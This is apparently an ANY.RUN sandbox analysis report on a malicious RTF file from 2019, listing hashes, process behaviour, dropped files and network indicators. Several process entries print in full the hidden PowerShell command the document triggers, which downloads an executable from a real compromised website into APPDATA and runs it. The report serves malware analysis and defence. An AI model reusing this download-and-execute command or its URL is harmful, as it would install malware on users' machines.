analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

f48915728045ced5b165fe6af946d82a88c03446281175e7de64a6214eea84ff.doc

Full analysis: https://app.any.run/tasks/8d8b945e-99f0-4466-841a-67e8d43c532a
Verdict: Malicious activity
Analysis date: March 14, 2019, 06:55:47
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
generated-doc
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

72630A05A8F1C7192778D65407CD8B65

SHA1:

9FFC130178ED5035E4C0EEA00B53697DBF0217AF

SHA256:

F48915728045CED5B165FE6AF946D82A88C03446281175E7DE64A6214EEA84FF

SSDEEP:

3072:oHGEMV5tEMV5tEMV5tEMV5tEMV5aID4SmHS:VE8tE8tE8tE8tE8aID4S+S

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • vbb326.exe (PID: 2352)
      • vbb326.exe (PID: 2192)
      • vbb326.exe (PID: 2828)
      • vbb326.exe (PID: 2968)
      • vbb326.exe (PID: 3092)
      • filename.exe (PID: 2244)
      • filename.exe (PID: 3356)
      • filename.exe (PID: 3168)
      • filename.exe (PID: 4084)
    • Executes PowerShell scripts

      • EXCEL.EXE (PID: 2264)
      • EXCEL.EXE (PID: 2560)
      • EXCEL.EXE (PID: 3256)
      • EXCEL.EXE (PID: 3624)
      • EXCEL.EXE (PID: 3980)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 3624)
      • EXCEL.EXE (PID: 2264)
      • EXCEL.EXE (PID: 3256)
      • EXCEL.EXE (PID: 2560)
      • EXCEL.EXE (PID: 3980)
    • Changes the autorun value in the registry

      • WScript.exe (PID: 1748)
      • WScript.exe (PID: 3048)
      • WScript.exe (PID: 2620)
      • WScript.exe (PID: 1156)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2172)
      • powershell.exe (PID: 2108)
      • powershell.exe (PID: 2464)
      • powershell.exe (PID: 3360)
      • powershell.exe (PID: 2644)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2172)
      • vbb326.exe (PID: 2352)
    • Starts itself from another location

      • vbb326.exe (PID: 2352)
      • vbb326.exe (PID: 3092)
      • vbb326.exe (PID: 2828)
      • vbb326.exe (PID: 2192)
    • Executes scripts

      • vbb326.exe (PID: 2352)
      • vbb326.exe (PID: 2192)
      • vbb326.exe (PID: 3092)
      • vbb326.exe (PID: 2828)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2264)
      • EXCEL.EXE (PID: 3624)
      • WINWORD.EXE (PID: 3456)
      • EXCEL.EXE (PID: 2560)
      • EXCEL.EXE (PID: 3256)
      • EXCEL.EXE (PID: 3980)
      • excelcnv.exe (PID: 3692)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3456)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

InternalVersionNumber: 57435
CharactersWithSpaces: 4
Characters: 4
Words: -
Pages: 1
TotalEditTime: -
RevisionNumber: 1
ModifyDate: 2019:01:07 23:54:00
CreateDate: 2019:01:07 23:54:00
LastModifiedBy: Admin
Author: Admin
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
61
Monitored processes
25
Malicious processes
8
Suspicious processes
5

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs excel.exe no specs powershell.exe vbb326.exe excel.exe no specs powershell.exe no specs vbb326.exe no specs excel.exe no specs powershell.exe no specs vbb326.exe no specs excel.exe no specs powershell.exe no specs vbb326.exe no specs excel.exe no specs powershell.exe no specs vbb326.exe no specs wscript.exe filename.exe no specs excelcnv.exe no specs wscript.exe wscript.exe filename.exe no specs filename.exe no specs wscript.exe filename.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3456"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\f48915728045ced5b165fe6af946d82a88c03446281175e7de64a6214eea84ff.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2264"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2172"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -noprofile $ta5fa71 = $env:APPDATA; $fc5b4fe = $ta5fa71 + '\\vbb326.exe'; If (test-path $fc5b4fe) {Remove-Item $fc5b4fe}; $q81b38 = New-Object System.Net.WebClient; $q81b38.Headers['User-Agent'] = 'q81b38'; $q81b38.DownloadFile('https://karenyauphotography.com/website/wp-content/upgrade/RFQ2018.exe', $fc5b4fe); Start-Process -Filepath $fc5b4fe; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2352"C:\Users\admin\AppData\Roaming\vbb326.exe" C:\Users\admin\AppData\Roaming\vbb326.exe
powershell.exe
User:
admin
Company:
MAPES4
Integrity Level:
MEDIUM
Description:
ORNERIER10
Exit code:
0
Version:
2.09.0009
3624"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2108"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -noprofile $ta5fa71 = $env:APPDATA; $fc5b4fe = $ta5fa71 + '\\vbb326.exe'; If (test-path $fc5b4fe) {Remove-Item $fc5b4fe}; $q81b38 = New-Object System.Net.WebClient; $q81b38.Headers['User-Agent'] = 'q81b38'; $q81b38.DownloadFile('https://karenyauphotography.com/website/wp-content/upgrade/RFQ2018.exe', $fc5b4fe); Start-Process -Filepath $fc5b4fe; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2192"C:\Users\admin\AppData\Roaming\vbb326.exe" C:\Users\admin\AppData\Roaming\vbb326.exepowershell.exe
User:
admin
Company:
MAPES4
Integrity Level:
MEDIUM
Description:
ORNERIER10
Exit code:
0
Version:
2.09.0009
2560"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Office14\EXCEL.EXEsvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
14.0.6024.1000
2464"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -noprofile $ta5fa71 = $env:APPDATA; $fc5b4fe = $ta5fa71 + '\\vbb326.exe'; If (test-path $fc5b4fe) {Remove-Item $fc5b4fe}; $q81b38 = New-Object System.Net.WebClient; $q81b38.Headers['User-Agent'] = 'q81b38'; $q81b38.DownloadFile('https://karenyauphotography.com/website/wp-content/upgrade/RFQ2018.exe', $fc5b4fe); Start-Process -Filepath $fc5b4fe; C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2828"C:\Users\admin\AppData\Roaming\vbb326.exe" C:\Users\admin\AppData\Roaming\vbb326.exepowershell.exe
User:
admin
Company:
MAPES4
Integrity Level:
MEDIUM
Description:
ORNERIER10
Exit code:
0
Version:
2.09.0009
Total events
6 687
Read events
5 896
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
14
Text files
5
Unknown types
3

Dropped files

PID
Process
Filename
Type
3456WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR867C.tmp.cvr
MD5:
SHA256:
2264EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR905F.tmp.cvr
MD5:
SHA256:
2172powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WKV1JENWJB2EI4WFELSW.temp
MD5:
SHA256:
3624EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRABA7.tmp.cvr
MD5:
SHA256:
2108powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZFPCYGWQQ4IO9QZ7213Q.temp
MD5:
SHA256:
2560EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRB8B7.tmp.cvr
MD5:
SHA256:
2464powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4EADL2G2FP2ADAVBH0R0.temp
MD5:
SHA256:
3256EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVRC990.tmp.cvr
MD5:
SHA256:
2644powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2EWANWFGG4DUWXRCSZI0.temp
MD5:
SHA256:
3980EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR1DF9.tmp.cvr
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2172
powershell.exe
69.195.124.102:443
karenyauphotography.com
Unified Layer
US
suspicious

DNS requests

Domain
IP
Reputation
karenyauphotography.com
  • 69.195.124.102
unknown

Threats

No threats detected
No debug info